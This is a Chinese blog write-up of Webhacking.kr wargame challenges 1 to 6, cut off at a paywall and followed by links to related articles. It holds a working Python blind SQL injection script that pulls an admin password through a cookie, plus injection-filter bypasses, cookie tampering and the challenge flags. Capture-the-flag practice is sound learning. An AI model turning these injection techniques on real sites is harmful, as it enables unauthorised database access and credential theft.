Webhacking.kr writeup(更新至challenge 29)

最新推荐文章于 2024-08-08 20:05:56 发布
最新推荐文章于 2024-08-08 20:05:56 发布
阅读量4.8k 收藏 2
点赞数 2
分类专栏: WriteUp Web 文章标签: WEB CTF writeup Webhacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_19876131/article/details/51148227
版权
本文是Webhacking.kr系列挑战的完整解答,涉及Web安全的各种技术,包括SQL注入、XSS、权限绕过等。作者通过逐个挑战的解析,详细介绍了解题思路和技巧,例如使用盲注、编码绕过过滤、JS解密等方法。每个挑战都提供了关键的payload和解题过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Webhacking.kr writeup

先附上题目的链接

http://webhacking.kr

challenge 1

第一个先看源码,

<a onclick=location.href='index.phps'>----- index.phps -----</a>

先有一个跳转,跟过去看看
又得到了一些源码,重点的如下:

<?

$password="????";

if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;

if($_COOKIE[user_lv]>5) @solve();

echo("<br>level : $_COOKIE[user_lv]");

?>

这里很容易就看出把cookie中的user_lv随便一个5-6之间的小树就可以了,所以直接抓包修改就行了

这里写图片描述

challenge 2

好吧这道题。。半知半解加上猜测勉强算是做出来。
回到正题。
点进去是这个样子

这里写图片描述

然后开始找线索,注意,该页的源码里面发现了很关键的东西

这里写图片描述

这就是那条龙对应的连接,点一下就进到了登录admin的界面

这里写图片描述

试了试没法儿注入,然后还发现了这里有个关键的东西:

这里写图片描述

又是要密码,试了试也没有可以注入的迹象,然后整个人都好了,看了题解之后(韩文题解,只能看懂图,爽翻。。。)
说是首页这里有问题

这里写图片描述

首页时
间注释掉了,然后通过抓包

这里写图片描述

试试这里有没有问题,把这里改成如下:

time=1460468419 and 1=1

发现时间变成了

这里写图片描述

那么再试试

time=1460468419 or 1=0

这里写图片描述

所以这里是存在盲注的,那么就可以尝试爆一点东西出来,
由于无法判断是什么数据库,自然也不好直接爆,顶多爆一下库名之类没什么卵用的东西。这里主要是猜想刚才那个admin界面的表对应是admin表,然后猜解他的password字段,
对应的python代码也比较简单,贴一贴吧

import requests
import re
db_length=-1
db_name=""
url = 'http://webhacking.kr/challenge/web/web-02/index.php'
r=requests.session()
def doinject(param):
    header={
  "Cookie":"time="+param+";PHPSESSID=58ltk3o56jd4ug007chbiorne3"}
    result=r.get(url,headers=header)
    content=result.content
    #print content
    if "09:00:01" in content:
        return 1
    return 0

def get_admin_pass():
    global db_length
    global db_name
    for i in xrange(100):
        param="1460468419 and if((select length(password) from admin)="+str(i)+",1,0)"
        if doinject(param):
            db_length=i
            break
    print db_length

    for i in xrange(1,db_length+1): 
        start=48
        end=122
        while(start!=end):
            #print str(start)+" : "+str(end)
            if(end-start==1):
                param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))="+str(start)+",1,0)"
                if(doinject(param)):
                    end=start
                else:
                    start=end
            else:
                mid=(start+end)/2
                param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))>="+str(mid)+",1,0)"
                if(doinject(param)):
                    start=mid
                else:
                    end=mid
        db_name+=chr(start)
        print db_name
    print db_name
get_admin_pass()

这里写图片描述

所以密码就是0nly_admin
那么用这个密码去登录admin页面,得到提示:

这里写图片描述

(尼玛啊,韩文提示你大爷的。。。。百度谷歌翻译一下把)
好歹告诉了一个什么密码还是什么的东西吧。试了试不是board处的密码。
好吧,到这里就怼不动了,看看题解,发现莫名其妙的脑洞第二个表名

这里写图片描述

已跪好吧!
有了第二个表名,又来猜密码,代码都不用变,直接把表名换成FreeB0aRd就可以了,真是烦,浪费我这么多时间,结果是个脑洞。

这里写图片描述

所以board处的密码就是7598522ae

输入之后出现个链接,给了个zip,__AdMiN__FiL2.zip,打开,是一个html文件

这里写图片描述

好吧,这个是有解压密码的,突然想到刚才在admin界面拿到的提示还没有用,那个密码@dM1n__nnanual,输入进去果然成功解压了!打开html文件
卧槽卧槽,终于出来了

这里写图片描述

所以flag就是这个了,HacKed_by_n0b0dY,好吧这道题我已经报警了,浪费了我整整快一天时间了。。。结果就尼玛脑洞过来的(好吧,可能是因为看不懂韩文,没有找到hint的位置吧)
然后去提交就行了。

challenge 3

打开就是这样一个网页

这里写图片描述

然后简单看看,只有右下角的5*5格子可以操作,看看源码也并没有什么有价值的东西
然后观察格子,最后猜测,就是每一行或每一列对应的就是我们应该画上的黑格子的数量,比如一个3,我们就要画三个连续的黑格子,比如111,我们就要画三个间隔的黑格子,所以试了试之后,如下:

这里写图片描述

出现一个输入框,先抓包看看,也没有什么异样,尝试注入,发现answer字段这里有注入的迹象

这里写图片描述

试了试之后,发现像是',or,#等等都被过滤了,最后成功的payload就是这个

这里写图片描述

||代替or,所以根据返回来看,答案就是new_sql_injection这个了

challenge 4

一看先是个base64解码,然后又是sha1解密,接着还是sha1解密
比较简单,最后答案就是test
不做赘述

challenge 5

这道题应该是比较简单的了,我觉得明明应该是对的但还是出不来,浪费了不少时间,这里先不写,回头再来补把。

challenge 6

看源码,一堆替换,第一部分php代码就是当我们没有设定cookie的时候它会自动生成,这部分不用管。重点是第二部分,

$decode_id=$_COOKIE[user];
$decode_pw=$_COOKIE[password];

$decode_id=str_replace("!","1",$decode_id);
$decode_id=str_replace("@","2",$decode_id);
$decode_id=str_replace("$","3",$decode_id);
$decode_id=str_replace("^","4",$decode_id);
$decode_id=str_replace("&","5",$decode_id);
$decode_id=str_replace("*","6",$decode_id);
$decode_id=str_replace("(","7",$decode_id);
$decode_id=str_replace(")","8",$decode_id);

$decode_pw=str_replace(
最低0.47元/天 解锁文章
WebWebhacking.kr旧版第二十四题
m0_58472289的博客
06-11 197
好像写的是我的ip和我现在用的user agent,下面写着ip不对。按view-source来看后台源码。 大概逻辑如下: 1. 采取SERVER和COOKIE。 2. 没有REMOTE_ADDR的话采取SERVER中的REMOTE_ADDR来做个新的REMOTE_ADDR。 3. 把REMOTE_ADDR的数值代入到ip并把HTTP_USER_AGENT的数值代入到agent。 4. 变量ip里的字符串含有“..”、“12”、“7.”、“0.”这些substring的话把“..”代替为..
如何玩Webhacking.kr
m0_58472289的博客
06-09 605
要是上方显示的信息不是Welcome Stranger而是你刚才注册的账号的话就表示成功!现在就可以开始做题了。Webhacking.kr是个来自于韩国的,可以在没有安全风险的模拟环境中练习网络安全web入侵实习平台。Challenge(Old)里面一共有60题。随便按一个按钮就可以进入习题。然后在上方的Login填写刚才注册的账号和密码。在我用红笔标的部分填入个人信息。成功的话可以在下方看到Join Success!1. 首先,Webhacking.kr是什么?进入这个页面后按我用红笔标的按钮。
web-hacking
weixin_30814223的博客
07-24 345
web入门文档,总结的挺好 https://files.cnblogs.com/files/cdy-tlpt/web-hacking-101.zip 转载于:https://www.cnblogs.com/cdy-tlpt/p/11239745.html
web安全-WEB2HACK
Coisini的博客
05-27 315
加入Webhacking.kr,从此赚取积分走上人生巅峰
CSU_Zipple的博客
10-01 911
有了研究web安全的人之后,web就变得不安全了 传送门:webhacking.kr 首先进入到该网址是这样的: 我刚开始随便试了一个1,2的账号密码,结果很幸运竟然进去了。 但是后台又提醒我这是一个wrong ip。 于是进不去了,后来又查看了该首页的源码,发现有这样一个地址: <input type=button value='Register' onclick=location.
网络安全与CTF在线学习资源网站
Dasdwer的博客
08-08 1342
安全参考》http://www.douban.com/group/topic/72383272/ (2013年第一期--2015年第一期)全集。http://security.cs.rpi.edu/courses/binexp-spring2015/ bin 干货区。http://www.secbox.cn/hacker/tools/3552.html 法客论坛2015工具包-第三版。
网络安全与CTF学习信息汇总
墙角睡大觉的专栏
07-11 3160
http://www.sec-wiki.com/skill/ 安全技能(里面渗透逆向编程都有介绍)http://blog.knownsec.com/Knownsec_RD_Checklist/ 知道创宇研发技能表v3.0**********************************************************综合学习平台:http://edu.gooann.com/ 谷安...
24个常见渗透测试漏洞靶场列表
一只臭皮匠的博客
09-09 7373
0x01 在线靶场 BUUCTF在线评测:https://buuoj.cn Vulhub漏洞环境集合:https://vulhub.org 韩国Webhacking:https://webhacking.kr 重生信息安全在线靶场:https://bc.csxa.cn 网络信息安全攻防学习平台:http://hackinglab.cn 墨者学院在线靶场:https://www.mozhe.cn/bug 封神台在线演练靶场:https://hack.zkaq.cn/battle 安鸾渗透实战平台:http:
渗透测试练习靶场汇总
xnxqwzy的博客
03-18 2095
Vulfocus 官网:在线演示:2.BUUCTF在线评测writeup文章:https://github.com/niudaii/my-vulstack-wphttps: //
网络安全课第一节 防止你的网站被入侵
fegus的博客
07-11 3378
我在安全行业从业 10 年,目前就职于某世界 500 强知名企业,主要从事安全应急、渗透测试等信息安全相关的工作。我曾多次获得“微软全球最具价值安全研究员”,也曾获得国内外各大知名厂商的漏洞致谢,包括 Mcicrosoft、Google、Apple、Adobe、阿里、百度等。早年,我在《黑客防线》《黑客手册》等知名技术杂志上发表文章,并常年混迹于国内各大 SRC 平台,以及 HackerOne 等国外知名的漏洞奖励平台,擅长领域涉及 Web、Android、Windows、macOS/iOS 等多个安全方向
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1342
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
简单分析SQL注入中对汉字的猜解
得峰的专栏 [网络收藏]
05-08 1155
   : 对于经常玩SQL Injection的朋友来说,对于字符的猜解,通常是一件枯燥、乏味、痛苦的事情,特别是中文字符的探测。一遍遍的输入,然后又一次次的被否决。不过
当SQL注入遇到诡异的编码问题
hackzkaq的博客
03-22 330
> 零基础学黑客,搜索公众号:白帽子左一 本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 前言 最近给甲方爸爸做渗透测试时发现了一个诡异的SQL注入,之所以说诡异,是因为该系统数据库连接编码与实际的数据库编码不一致,并且数据库表字段名使用了中文的字段名,导致通过正常手段无法获取到数据库数据。 故事开始 1、拿到资产清单后,发现有这样一个站。 2、简单测试了一下,发现该页面无验证码,无密码验证次数限制,可进行暴力破解,但进行了一波爆
Webhacking writeup By Assassin [随便玩一玩]
Assassin
09-14 2791
果真是webhacking,申请账号都这么有逼格^_^用burp抓包发现源码访问如下 还有什么decode me需要三次解码base64即可得到一个ip值即可,然后就可以开始我们的挑战啦!第一关上来得到代码<? if(!$_COOKIE[user_lv]) { SetCookie("user_lv","1"); echo("<meta http-equiv=refresh content=0>")
wargame.kr WriteUp
Bendawang's Blog
10-22 2932
wargame.kr
pwnable.kr wp&总结
Ree的整理与收集
08-30 1088
1.fd2.collision3.bof(python -c ‘print “A” * 52 + “\xbe\xba\xfe\xca”’; cat -) | nc pwnable.kr 9000 python -c 参数 linux | 命令:command 1 | command 2 把command 1的结果传给command 2做参数
网络安全学习必不可少的一些网站
酒鸿色的心专栏
10-18 4906
网络安全学习必不可少的一些网站 本文由 酷安全 和其小伙伴整理 ------------- https://trailofbits.github.io/ctf/ --介绍 -->(翻译)http://blog.idf.cn/2015/02/ctf-field-guide/ ******************************************************
EIS 2018 部分web writeup
Kr的博客
11-20 628
打过这么多比赛,好像还是没有进入过比赛的状态,肯定是太菜了,虽然没做出来,也记一下,权当学习一下这些思路。 web: SimpleBBS 这个题是登录框的一个报错注入,很简单的一个题,但是没想到 如果在登陆框中输入单引号,数据库就会报错,所以是一个报错注入 然后burp抓包 使用updatexml语句进行报错注入 payload: username=admin' and ...
Downloading https://services.gradle.org/distributions/gradle-5.5.1-bin.zip
最新发布
03-15
### Gradle 5.5.1 Bin Zip 下载链接 Gradle 5.5.1 的二进制分发包可以通过多个渠道获取。以下是几个可用的下载地址: #### 官方镜像源 可以访问腾讯云提供的官方镜像站点来下载所需的文件,具体路径如下: ```plaintext https://mirrors.cloud.tencent.com/gradle/gradle-5.5.1-bin.zip ``` 此链接由分析配置文件得出结论[^4]。 #### 开源工具库 另一个可选方案是从开源工具库中直接获取该版本的二进制文件,其项目地址为: ```plaintext https://gitcode.com/open-source-toolkit/4183d ``` 这里提供了名为 `gradle-5.5.1-bin.zip` 的资源文件供用户下载[^1]。 #### 针对 Qt 用户 对于使用 Qt 进行 Android 应用开发的开发者来说,也可以从专门针对 Qt 提供的支持页面下载对应的 Gradle 版本: ```plaintext https://gitcode.com/open-source-toolkit/23f98 ``` 该项目同样包含了适用于 Qt 平台编译需求的 Gradle 5.5.1 二进制文件[^5]。 如果上述方法均无法满足您的需求或者遇到网络限制等问题,则还可以尝试其他第三方存储服务作为备选方案之一,比如微云分享链接(需注意提取码): ```plaintext https://share.weiyun.com/5n5kr6v (密码:ctRR) ``` 不过需要注意的是这个位置实际存放的是 Gradle 5.1.1 而不是目标版本,请谨慎选用[^2]。 最终推荐优先考虑前两个正式途径完成安装部署工作以确保稳定性和兼容性表现最佳效果。 ```python import requests def download_gradle(url, destination): response = requests.get(url, stream=True) with open(destination, 'wb') as file: for chunk in response.iter_content(chunk_size=1024): if chunk: file.write(chunk) download_url = "https://mirrors.cloud.tencent.com/gradle/gradle-5.5.1-bin.zip" destination_path = "./gradle-5.5.1-bin.zip" try: download_gradle(download_url, destination_path) except Exception as e: print(f"Download failed: {e}") ```
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值